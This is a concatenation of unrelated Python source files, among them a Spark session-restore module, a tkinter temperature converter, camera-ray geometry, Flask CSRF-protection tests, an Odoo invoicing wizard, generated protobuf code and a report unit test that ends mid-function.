db['autorestore/' + 'stored_endpoints'] = list()
return list()
except Exception as caught_exc:
db['autorestore/' + 'stored_endpoints'] = list()
ipython_display.writeln("Failed to restore stored_endpoints from a previous notebook "\
f"session due to an error: {str(caught_exc)}. Cleared stored_endpoints.")
return list()
def get_session_id_to_name(db, ipython_display):
"""Gets a dictionary that maps currently running livy session id's to their names
Args:
db (dict): the ipython database where sessions dict will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring sessions
Returns:
session_id_to_name (dict): a dictionary mapping session.id -> name
If no sessions can be obtained from previous notebook sessions, an
empty dict is returned.
"""
try:
session_id_to_name = db['autorestore/' + 'session_id_to_name']
return session_id_to_name
except KeyError:
db['autorestore/' + 'session_id_to_name'] = dict()
return dict()
except Exception as caught_exc:
ipython_display.writeln("Failed to restore session_id_to_name from a previous notebook "\
f"session due to an error: {str(caught_exc)}. Cleared session_id_to_name.")
return dict()
def _restore_endpoints_and_sessions(db, ipython_display, spark_controller, endpoints):
"""Loads all of the running livy sessions of an endpoint
Args:
db (dict): the ipython database where stored_endpoints list will be stored
ipython_display (hdijupyterutils.ipythondisplay.IpythonDisplay): the display that
informs the user of any errors that occur while restoring endpoints
spark_controller (sparkmagic.livyclientlib.sparkcontroller.SparkController): an object that
manages all the spark sessions
endpoints (dict): the endpoints dict that restored endpoints will be added to.
"""
stored_endpoints = get_stored_endpoints(db, ipython_display)
try:
for serialized_endpoint in stored_endpoints:
args = Namespace(auth='Google', url=serialized_endpoint.get('url'), \
account=serialized_endpoint.get('account'))
auth = initialize_auth(args)
endpoint = Endpoint(url=serialized_endpoint.get('url'), auth=auth)
endpoints[endpoint.url] = endpoint
# If a user revokes the credentials used for stored endpoints and sessions,
# all of the stored endpoints and sessions are cleared.
except BadUserConfigurationException as caught_exc:
db['autorestore/' + 'stored_endpoints'] = list()
db['autorestore/' + 'session_id_to_name'] = dict()
ipython_display.send_error("Failed to restore endpoints and sessions "\
f"due to an authentication error: {str(caught_exc)}. "\
"Cleared stored_endpoints and session_id_to_name.")
for endpoint in endpoints.values():
session_id_to_name = get_session_id_to_name(db, ipython_display)
#get all sessions running on that endpoint
endpoint_sessions = spark_controller.get_all_sessions_endpoint(endpoint)
#add each session to session manager.
for session in endpoint_sessions:
name = session_id_to_name.get(session.id)
if name is not None and name not in spark_controller.get_managed_clients():
spark_controller.session_manager.add_session(name, session)
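# Hedged wiring sketch (variable names are illustrative, not from this module):
# a kernel extension would typically call
#   _restore_endpoints_and_sessions(db, ipython_display,
#                                   spark_controller, endpoints)
# once at startup so endpoints and named sessions from earlier notebook
# sessions reappear in the session manager.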
|
python
|
# Celsius to Fahrenheit converter
import tkinter
class FahrenheiterGUI(): # :D
def __init__(self):
# create the main window
self.main_window = tkinter.Tk()
# set the title
self.main_window.title("Celcius to Fahrenheit")
# create three frames for this GUI
self.top_frame = tkinter.Frame(self.main_window)
self.mid_frame = tkinter.Frame(self.main_window)
self.bottom_frame = tkinter.Frame(self.main_window)
# create widgets for the top frame
self.prompt_label = tkinter.Label(self.top_frame,
text="Enter the Celcius temperature: ")
self.entry_celcius = tkinter.Entry(self.top_frame,
width=10)
# pack them
self.prompt_label.pack(side="left")
self.entry_celcius.pack(side="left")
# MID FRAME
self.display_message = tkinter.Label(self.mid_frame,
text="In Fahrenheit it equals to:")
# create a StringVar to hold the converted value
self.fahrenheit = tkinter.StringVar()
# create a label to show this converted value.
self.show_fahrenheit = tkinter.Label(self.mid_frame,
textvariable=self.fahrenheit)
# pack them
self.display_message.pack(side="left")
self.show_fahrenheit.pack(side="left")
# BOTTOM FRAME
# button that performs the conversion
self.calc_button = tkinter.Button(self.bottom_frame,
text="Convert to Fahrenheit",
command=self.convert)
self.quit_button = tkinter.Button(self.bottom_frame,
text="Quit",
bg="red",
command=self.main_window.destroy)
# pack them
self.calc_button.pack(side="left")
self.quit_button.pack(side="left")
# pack the frames.
self.top_frame.pack()
self.mid_frame.pack()
self.bottom_frame.pack()
# enter into mainloop
self.main_window.mainloop()
def convert(self):
# convert the given value
# remember .get method returns "String" convert it into int or float
# for mathematical expressions.
self.calculated_fahrenheit = (
(9 / 5) * float(self.entry_celcius.get()) + 32)
# return fahrenheit back into StringVar object using .set() method
self.fahrenheit.set(format(self.calculated_fahrenheit, ",.2f"))
# create an instance of Fahrenheiter
example = FahrenheiterGUI()
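# Quick sanity check of the formula used in convert() (illustrative only):
# (9 / 5) * 100.0 + 32 == 212.0 and (9 / 5) * 0.0 + 32 == 32.0,
# so the boiling and freezing points of water come out as expected.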
|
python
|
#!/usr/local/bin/python
# Physics Equation Graph
# Ben Payne <[email protected]>
import sys
import os
lib_path = os.path.abspath('lib')
sys.path.append(lib_path) # this has to precede use of physgraph
db_path = os.path.abspath('databases')
sys.path.append(lib_path) # this has to precede use of physgraph
import lib_physics_graph as physgraf
from xml.dom.minidom import parseString
#all these imports are standard on most modern python implementations
#open the xml file for reading:
file = open(db_path+'/statements_database.xml','r')
#convert to string:
data = file.read()
#close file because we dont need it anymore:
file.close()
#parse the xml you got from the file
dom = parseString(data)
#retrieve the first xml tag (<tag>data</tag>) that the parser finds with name tagName:
xmlTag = dom.getElementsByTagName('statement')[0].toxml()
#strip off the tag (<tag>data</tag> ---> data):
xmlData=xmlTag.replace('<statement>','').replace('</statement>','')
print "\nprint out the xml tag and data in this format: <tag>data</tag>"
print xmlTag
print "\njust print the data"
print xmlData
|
python
|
import numpy as np
import torch
from colorsys import hsv_to_rgb
def get_camera_rays(c_pos, width=320, height=240, focal_length=0.035, sensor_width=0.032, noisy=False,
vertical=None, c_track_point=None):
#c_pos = np.array((0., 0., 0.))
# The camera is pointed at the origin
if c_track_point is None:
c_track_point = np.array((0., 0., 0.))
if vertical is None:
vertical = np.array((0., 0., 1.))
c_dir = (c_track_point - c_pos)
c_dir = c_dir / np.linalg.norm(c_dir)
img_plane_center = c_pos + c_dir * focal_length
# The horizontal axis of the camera sensor is horizontal (z=0) and orthogonal to the view axis
img_plane_horizontal = np.cross(c_dir, vertical)
#img_plane_horizontal = np.array((-c_dir[1]/c_dir[0], 1., 0.))
img_plane_horizontal = img_plane_horizontal / np.linalg.norm(img_plane_horizontal)
# The vertical axis is orthogonal to both the view axis and the horizontal axis
img_plane_vertical = np.cross(c_dir, img_plane_horizontal)
img_plane_vertical = img_plane_vertical / np.linalg.norm(img_plane_vertical)
# Double check that everything is orthogonal
def is_small(x, atol=1e-7):
return abs(x) < atol
assert(is_small(np.dot(img_plane_vertical, img_plane_horizontal)))
assert(is_small(np.dot(img_plane_vertical, c_dir)))
assert(is_small(np.dot(c_dir, img_plane_horizontal)))
# Sensor height is implied by sensor width and aspect ratio
sensor_height = (sensor_width / width) * height
# Compute pixel boundaries
horizontal_offsets = np.linspace(-1, 1, width+1) * sensor_width / 2
vertical_offsets = np.linspace(-1, 1, height+1) * sensor_height / 2
# Compute pixel centers
horizontal_offsets = (horizontal_offsets[:-1] + horizontal_offsets[1:]) / 2
vertical_offsets = (vertical_offsets[:-1] + vertical_offsets[1:]) / 2
horizontal_offsets = np.repeat(np.reshape(horizontal_offsets, (1, width)), height, 0)
vertical_offsets = np.repeat(np.reshape(vertical_offsets, (height, 1)), width, 1)
if noisy:
pixel_width = sensor_width / width
pixel_height = sensor_height / height
horizontal_offsets += (np.random.random((height, width)) - 0.5) * pixel_width
vertical_offsets += (np.random.random((height, width)) - 0.5) * pixel_height
horizontal_offsets = (np.reshape(horizontal_offsets, (height, width, 1)) *
np.reshape(img_plane_horizontal, (1, 1, 3)))
vertical_offsets = (np.reshape(vertical_offsets, (height, width, 1)) *
np.reshape(img_plane_vertical, (1, 1, 3)))
image_plane = horizontal_offsets + vertical_offsets
image_plane = image_plane + np.reshape(img_plane_center, (1, 1, 3))
c_pos_exp = np.reshape(c_pos, (1, 1, 3))
rays = image_plane - c_pos_exp
ray_norms = np.linalg.norm(rays, axis=2, keepdims=True)
rays = rays / ray_norms
return rays.astype(np.float32)
def depths_to_world_coords(depths, rays, camera_pos, depth_noise=None, noise_ratio=1.):
#height, width = depths.shape
#sensor_width = (0.032 / 320) * width
#rays = get_camera_rays(camera_pos)
# TODO: Put this code in a place that makes sense
if depth_noise is not None:
noise_indicator = (np.random.random(depths.shape) <= noise_ratio).astype(np.float32)
depths = depths + noise_indicator * np.random.random(depths.shape) * depth_noise
#rays = prep_fn(rays)
surface_points = camera_pos + rays * np.expand_dims(depths, -1)
return surface_points.astype(np.float32)
def importance_sample_empty_points(surface_points, depths, camera_pos, cutoff=0.98, p_near=0.5):
num_points = surface_points.shape[0]
rays = surface_points - camera_pos
random_intercepts = np.random.random((num_points, 1)).astype(np.float32)
near_indicator = np.random.binomial(1, p_near, size=(num_points, 1))
range_bottom = near_indicator * cutoff
range_top = cutoff + (near_indicator * (1. - cutoff))
random_intercepts = range_bottom + (range_top - range_bottom) * random_intercepts
noise_points = camera_pos + (random_intercepts * rays)
weights = (cutoff * depths * (1 - near_indicator[..., 0]) * 2 +
(1 - cutoff) * depths * near_indicator[..., 0] * 2)
return noise_points.astype(np.float32), weights.astype(np.float32)
def zs_to_depths(zs, rays, camera_pos):
view_axis = -camera_pos
view_axis = view_axis / np.linalg.norm(view_axis, axis=-1, keepdims=True)
factors = np.einsum('...i,i->...', rays, view_axis)
depths = zs / factors
return depths
def frustum_cull(points, camera_pos, rays, near_plane=None, far_plane=None):
corners = [rays[0, 0], rays[0, -1], rays[-1, -1], rays[-1, 0]]
rel_points = points - np.expand_dims(camera_pos, 0)
included = np.ones(points.shape[0])
for i in range(4):
c1 = corners[i]
c2 = corners[(i+1) % 4]
normal = np.cross(c1, c2)
normal /= np.linalg.norm(normal)
d = (rel_points * np.expand_dims(normal, 0)).sum(-1)
included = np.logical_and(included, d >= 0)
return included
def get_clustering_colors(num_colors):
colors = [(0., 0., 0.)]
for i in range(num_colors):
colors.append(hsv_to_rgb(i / num_colors, 0.45, 0.8))
colors = np.array(colors)
return colors
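# Illustrative end-to-end sketch (camera position, image size and the constant
# depth map are made-up assumptions, not values from this repo):
# c_pos = np.array([2.0, 0.0, 1.5])
# rays = get_camera_rays(c_pos, width=320, height=240)        # (240, 320, 3)
# depths = np.full((240, 320), 2.5, dtype=np.float32)
# points = depths_to_world_coords(depths, rays, c_pos)        # (240, 320, 3)
# keep = frustum_cull(points.reshape(-1, 3), c_pos, rays)     # boolean mask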
|
python
|
from __future__ import with_statement
import re
import pytest
from flask import Flask
from blessed_extensions import csrf_token
from pg_discuss._compat import to_unicode
csrf_token_input = re.compile(
r'([0-9a-z#A-Z-\.]*)'
)
def get_csrf_token(data):
match = csrf_token_input.search(to_unicode(data))
assert match
return match.groups()[0]
def create_app():
app = Flask(__name__)
app.secret_key = "secret"
@app.route('/csrftoken', methods=['GET'])
def csrftoken():
return csrf_token.generate_csrf()
return app
@pytest.fixture
def app():
"""Fixture to create an app with CsrfTokenExt initialized.
Creates several views for testing.
"""
app = create_app()
app.config['SECRET_KEY'] = "a poorly kept secret."
csrf = csrf_token.CsrfTokenExt(app)
csrf.init_app(app)
app.client = app.test_client()
@app.route('/', methods=['GET', 'POST'])
def csrf_protected():
return 'protected'
@csrf.exempt
@app.route('/csrf-exempt', methods=['GET', 'POST'])
def csrf_exempt():
return 'exempt'
@csrf.exempt
@app.route('/csrf-protect-method', methods=['GET', 'POST'])
def csrf_protect_method():
csrf.protect()
return 'protected'
return app
def test_missing_secret_key(app):
app.config['SECRET_KEY'] = None
with app.test_request_context():
with pytest.raises(ValueError):
csrf_token.generate_csrf()
def test_invalid_csrf(app):
response = app.client.post("/", data={"name": "danny"})
assert response.status_code == 403
assert b'token missing' in response.data
def test_invalid_csrf2(app):
# tests with bad token
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': "9999999999999##test"}
)
assert response.status_code == 403
def test_invalid_csrf3(app):
# tests with bad token
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': "foo"}
)
assert response.status_code == 403
def test_invalid_secure_csrf3(app):
# test with multiple separators
response = app.client.post(
"/",
data={"name": "danny"},
# will work only if greater than time.time()
base_url='https://localhost/',
)
assert response.status_code == 403
def test_valid_csrf(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': token},
base_url='https://localhost/',
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
)
assert b'protected' in response.data
def test_invalid_secure_csrf(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={'X-CSRF-Token': token},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'failed' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://example.com/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'http://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost:3000/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
assert b'not match' in response.data
def test_valid_secure_csrf(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 200
def test_valid_csrf_method(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/csrf-protect-method",
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
)
assert response.status_code == 200
def test_invalid_csrf_method(app):
response = app.client.post("/csrf-protect-method", data={"name": "danny"})
assert response.status_code == 403
response = app.client.post("/", data={"name": "danny"})
assert response.status_code == 403
assert b'token missing' in response.data
def test_empty_csrf_headers(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
app.config['CSRF_TOKEN_HEADERS'] = list()
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 403
def test_custom_csrf_headers(app):
response = app.client.get("/csrftoken", base_url='https://localhost/')
token = get_csrf_token(response.data)
app.config['CSRF_TOKEN_HEADERS'] = ['X-XSRF-TOKEN']
response = app.client.post(
"/",
data={"name": "danny"},
headers={
'X-XSRF-TOKEN': token,
},
environ_base={
'HTTP_REFERER': 'https://localhost/',
},
base_url='https://localhost/',
)
assert response.status_code == 200
def test_not_endpoint(app):
response = app.client.post('/not-endpoint')
assert response.status_code == 404
def test_testing(app):
app.testing = True
app.client.post("/", data={"name": "danny"})
def test_csrf_exempt(app):
response = app.client.get("/csrftoken")
token = get_csrf_token(response.data)
response = app.client.post(
"/csrf-exempt",
data={"name": "danny"},
headers={
'X-CSRF-Token': token,
},
)
assert b'exempt' in response.data
def test_validate_csrf(app):
with app.test_request_context():
assert not csrf_token.validate_csrf('ff##dd')
token = csrf_token.generate_csrf()
assert csrf_token.validate_csrf(token)
def test_validate_not_expiring_csrf(app):
with app.test_request_context():
token = csrf_token.generate_csrf(time_limit=False)
assert csrf_token.validate_csrf(token, time_limit=False)
def test_csrf_check_default_false():
"""This test does not use the app fixture, since we need to change
a setting that is used in initialization of the extension.
"""
app = create_app()
app.config['CSRF_TOKEN_CHECK_DEFAULT'] = False
app.config['SECRET_KEY'] = "a poorly kept secret."
csrf = csrf_token.CsrfTokenExt(app)
csrf.init_app(app)
app.client = app.test_client()
@app.route('/foo', methods=['GET', 'POST'])
def csrf_protected2():
return 'protected'
response = app.client.post("/foo", data={"name": "danny"})
assert response.status_code == 200
|
python
|
##############################################################################
# For copyright and license notices, see __manifest__.py file in root directory
##############################################################################
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
class AccountPaymentGroupInvoiceWizard(models.TransientModel):
_name = "account.payment.group.invoice.wizard"
_description = "account.payment.group.invoice.wizard"
@api.model
def default_payment_group(self):
return self.env['account.payment.group'].browse(
self._context.get('active_id', False))
payment_group_id = fields.Many2one(
'account.payment.group',
default=default_payment_group,
ondelete='cascade',
required=True,
)
journal_id = fields.Many2one(
'account.journal',
'Journal',
required=True,
ondelete='cascade',
)
invoice_date = fields.Date(
string='Refund Date',
default=fields.Date.context_today,
required=True
)
currency_id = fields.Many2one(
related='payment_group_id.currency_id',
)
date = fields.Date(
string='Accounting Date'
)
product_id = fields.Many2one(
'product.product',
required=True,
domain=[('sale_ok', '=', True)],
)
tax_ids = fields.Many2many(
'account.tax',
string='Taxes',
)
amount_untaxed = fields.Monetary(
string='Untaxed Amount',
required=True,
compute='_compute_amount_untaxed',
inverse='_inverse_amount_untaxed',
)
# we make amount total the main one and the other computed because the
# normal case of use would be to know the total amount and also this amount
# is the suggested one on creating the wizard
amount_total = fields.Monetary(
string='Total Amount',
required=True
)
description = fields.Char(
string='Reason',
)
company_id = fields.Many2one(
related='payment_group_id.company_id',
)
account_analytic_id = fields.Many2one(
'account.analytic.account',
'Analytic Account',
)
@api.onchange('product_id')
def change_product(self):
self.ensure_one()
if self.payment_group_id.partner_type == 'supplier':
taxes = self.product_id.supplier_taxes_id
else:
taxes = self.product_id.taxes_id
company = self.company_id or self.env.company
taxes = taxes.filtered(lambda r: r.company_id == company)
self.tax_ids = self.payment_group_id.partner_id.with_context(
force_company=company.id).property_account_position_id.map_tax(
taxes)
@api.onchange('amount_untaxed', 'tax_ids')
def _inverse_amount_untaxed(self):
self.ensure_one()
if self.tax_ids:
taxes = self.tax_ids.compute_all(
self.amount_untaxed, self.company_id.currency_id, 1.0,
product=self.product_id,
partner=self.payment_group_id.partner_id)
self.amount_total = taxes['total_included']
else:
self.amount_total = self.amount_untaxed
@api.depends('tax_ids', 'amount_total')
def _compute_amount_untaxed(self):
"""
For now we implement inverse only for percent taxes. We could extend to
other by simulating tax.price_include = True, computing tax and
then restoring tax.price_include = False.
"""
self.ensure_one()
tax_percent = 0.0
for tax in self.tax_ids.filtered(
lambda x: not x.price_include):
if tax.amount_type == 'percent':
tax_percent += tax.amount
elif tax.amount_type == 'partner_tax':
# ugly compatibility with l10n_ar l10n_ar_account_withholding
tax_percent += tax.get_partner_alicuot(
self.payment_group_id.partner_id,
fields.Date.context_today(self)).alicuota_percepcion
else:
raise ValidationError(_(
'You can only set amount total if taxes are of type '
'percentage'))
total_percent = (1 + tax_percent / 100) or 1.0
self.amount_untaxed = self.amount_total / total_percent
@api.onchange('payment_group_id')
def change_payment_group(self):
journal_type = 'sale'
type_tax_use = 'sale'
if self.payment_group_id.partner_type == 'supplier':
journal_type = 'purchase'
type_tax_use = 'purchase'
journal_domain = [
('type', '=', journal_type),
('company_id', '=', self.payment_group_id.company_id.id),
]
tax_domain = [
('type_tax_use', '=', type_tax_use),
('company_id', '=', self.payment_group_id.company_id.id)]
self.journal_id = self.env['account.journal'].search(
journal_domain, limit=1)
# usually debit/credit note will be for the payment difference
self.amount_total = abs(self.payment_group_id.payment_difference)
return {'domain': {
'journal_id': journal_domain,
'tax_ids': tax_domain,
}}
def get_invoice_vals(self):
self.ensure_one()
payment_group = self.payment_group_id
if payment_group.partner_type == 'supplier':
invoice_type = 'in_'
else:
invoice_type = 'out_'
if self._context.get('refund'):
invoice_type += 'refund'
else:
invoice_type += 'invoice'
return {
'invoice_payment_ref': self.description,
'date': self.date,
'invoice_date': self.invoice_date,
'invoice_origin': _('Payment id %s') % payment_group.id,
'journal_id': self.journal_id.id,
'invoice_user_id': payment_group.partner_id.user_id.id,
'partner_id': payment_group.partner_id.id,
'type': invoice_type,
}
def confirm(self):
self.ensure_one()
self = self.with_context(company_id=self.company_id.id, force_company=self.company_id.id)
invoice_vals = self.get_invoice_vals()
line_vals = {
'product_id': self.product_id.id,
'price_unit': self.amount_untaxed,
'tax_ids': [(6, 0, self.tax_ids.ids)],
}
if self.account_analytic_id:
line_vals['analytic_account_id'] = self.account_analytic_id.id
invoice_vals['invoice_line_ids'] = [(0, 0, line_vals)]
invoice = self.env['account.move'].create(invoice_vals)
invoice.action_post()
self.payment_group_id.to_pay_move_line_ids += (invoice.open_move_line_ids)
|
python
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: helloworld.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from nrpc import nrpc_pb2 as nrpc_dot_nrpc__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="helloworld.proto",
package="helloworld",
syntax="proto3",
serialized_options=b"\n\033io.grpc.examples.helloworldB\017HelloWorldProtoP\001",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x10helloworld.proto\x12\nhelloworld\x1a\x0fnrpc/nrpc.proto"\x1c\n\x0cHelloRequest\x12\x0c\n\x04name\x18\x01 \x01(\t"E\n\nHelloReply\x12\x10\n\x06result\x18\x01 \x01(\tH\x00\x12\x1c\n\x05\x65rror\x18\x02 \x01(\x0b\x32\x0b.nrpc.ErrorH\x00\x42\x07\n\x05reply2I\n\x07Greeter\x12>\n\x08SayHello\x12\x18.helloworld.HelloRequest\x1a\x16.helloworld.HelloReply"\x00\x42\x30\n\x1bio.grpc.examples.helloworldB\x0fHelloWorldProtoP\x01\x62\x06proto3',
dependencies=[
nrpc_dot_nrpc__pb2.DESCRIPTOR,
],
)
_HELLOREQUEST = _descriptor.Descriptor(
name="HelloRequest",
full_name="helloworld.HelloRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="helloworld.HelloRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=49,
serialized_end=77,
)
_HELLOREPLY = _descriptor.Descriptor(
name="HelloReply",
full_name="helloworld.HelloReply",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="result",
full_name="helloworld.HelloReply.result",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="error",
full_name="helloworld.HelloReply.error",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="reply",
full_name="helloworld.HelloReply.reply",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
],
serialized_start=79,
serialized_end=148,
)
_HELLOREPLY.fields_by_name["error"].message_type = nrpc_dot_nrpc__pb2._ERROR
_HELLOREPLY.oneofs_by_name["reply"].fields.append(_HELLOREPLY.fields_by_name["result"])
_HELLOREPLY.fields_by_name["result"].containing_oneof = _HELLOREPLY.oneofs_by_name[
"reply"
]
_HELLOREPLY.oneofs_by_name["reply"].fields.append(_HELLOREPLY.fields_by_name["error"])
_HELLOREPLY.fields_by_name["error"].containing_oneof = _HELLOREPLY.oneofs_by_name[
"reply"
]
DESCRIPTOR.message_types_by_name["HelloRequest"] = _HELLOREQUEST
DESCRIPTOR.message_types_by_name["HelloReply"] = _HELLOREPLY
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
HelloRequest = _reflection.GeneratedProtocolMessageType(
"HelloRequest",
(_message.Message,),
{
"DESCRIPTOR": _HELLOREQUEST,
"__module__": "helloworld_pb2"
# @@protoc_insertion_point(class_scope:helloworld.HelloRequest)
},
)
_sym_db.RegisterMessage(HelloRequest)
HelloReply = _reflection.GeneratedProtocolMessageType(
"HelloReply",
(_message.Message,),
{
"DESCRIPTOR": _HELLOREPLY,
"__module__": "helloworld_pb2"
# @@protoc_insertion_point(class_scope:helloworld.HelloReply)
},
)
_sym_db.RegisterMessage(HelloReply)
DESCRIPTOR._options = None
_GREETER = _descriptor.ServiceDescriptor(
name="Greeter",
full_name="helloworld.Greeter",
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=150,
serialized_end=223,
methods=[
_descriptor.MethodDescriptor(
name="SayHello",
full_name="helloworld.Greeter.SayHello",
index=0,
containing_service=None,
input_type=_HELLOREQUEST,
output_type=_HELLOREPLY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
],
)
_sym_db.RegisterServiceDescriptor(_GREETER)
DESCRIPTOR.services_by_name["Greeter"] = _GREETER
# @@protoc_insertion_point(module_scope)
|
python
|
# extract text from a img and its coordinates using the pytesseract module
import cv2
import pytesseract
# You need to add tesseract binary dependency to system variable for this to work
img =cv2.imread('img.png')
#We need to convert the img into RGB format
img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
hI,wI,k=img.shape
print(pytesseract.image_to_string(img))
boxes=pytesseract.image_to_boxes(img)
for b in boxes.splitlines():
b=b.split(' ')
x,y,w,h=int(b[1]),int(b[2]),int(b[3]),int(b[4])
cv2.rectangle(img, (x, hI - y), (w, hI - h), (0, 0, 255), 2)
cv2.imshow('img',img)
cv2.waitKey(0)
|
python
|
from cwr_admin.resources.cwr import CWRFilesResource, CWRProcessorResource, \
CWRMatchResultResource, CWRFilesRemoveResource, CWRMatchBeginResource, \
CWRMatchRejectResource, CWRMatchAcceptResource, CWRMatchFeedbackResource
|
python
|
# This code is based on https://github.com/Ryo-Ito/spatial_transformer_network
import tensorflow as tf
def mgrid(*args, **kwargs):
low = kwargs.pop("low", -1)
high = kwargs.pop("high", 1)
low = tf.to_float(low)
high = tf.to_float(high)
coords = (tf.linspace(low, high, arg) for arg in args)
grid = tf.stack(tf.meshgrid(*coords, indexing='ij'))
return grid
def batch_mgrid(n_batch, *args, **kwargs):
grid = mgrid(*args, **kwargs)
grid = tf.expand_dims(grid, 0)
grids = tf.tile(grid, [n_batch] + [1 for _ in range(len(args) + 1)])
return grids
|
python
|
#!/usr/bin/env python
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
#
# Unit tests for test reports.
import inspect
import os
import unittest
from curie.node_failure_test.node_failure_test import NodeFailureTest
from curie.node_failure_data_loss_test.node_failure_data_loss_test \
import NodeFailureDataLossTest
from curie.oltp_dss_test.oltp_dss_test import OltpDssTest
from curie.oltp_vdi_test.oltp_vdi_test import OltpVdiTest
from curie.oltp_snapshot_test.oltp_snapshot_test import OltpSnapshotTest
from curie.rolling_upgrade_test.rolling_upgrade_test import RollingUpgradeTest
# Top directory of repository.
TOP = os.path.realpath("%s/../../" %
os.path.abspath(
os.path.dirname(
os.path.abspath(globals()["__file__"]))))
MODULE_NAME = inspect.getmodulename(__file__)
# -----------------------------------------------------------------------------
def module_output_dir():
if "TESTOUTDIR" in os.environ:
return os.environ["TESTOUTDIR"]
else:
return os.path.join(TOP, "build", "testoutput", "curie", "pytest",
"%s.py" % MODULE_NAME)
class TestTestReport(unittest.TestCase):
def setUp(self):
self.__data_dir = os.path.abspath(os.path.join(".",
"resource/reporting_test"))
self.__output_dir = module_output_dir()
if not os.path.exists(self.__output_dir):
os.makedirs(self.__output_dir)
def test_ntnx_oltp_dss_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_dss")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_dss")
OltpDssTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_oltp_vdi_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_vdi")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_vdi")
OltpVdiTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_oltp_snapshot_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "oltp_snapshot")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "oltp_snapshot")
OltpSnapshotTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_node_failure_report(self):
test_output_dir = os.path.join(self.__output_dir, "ntnx", "node_failure")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "node_failure")
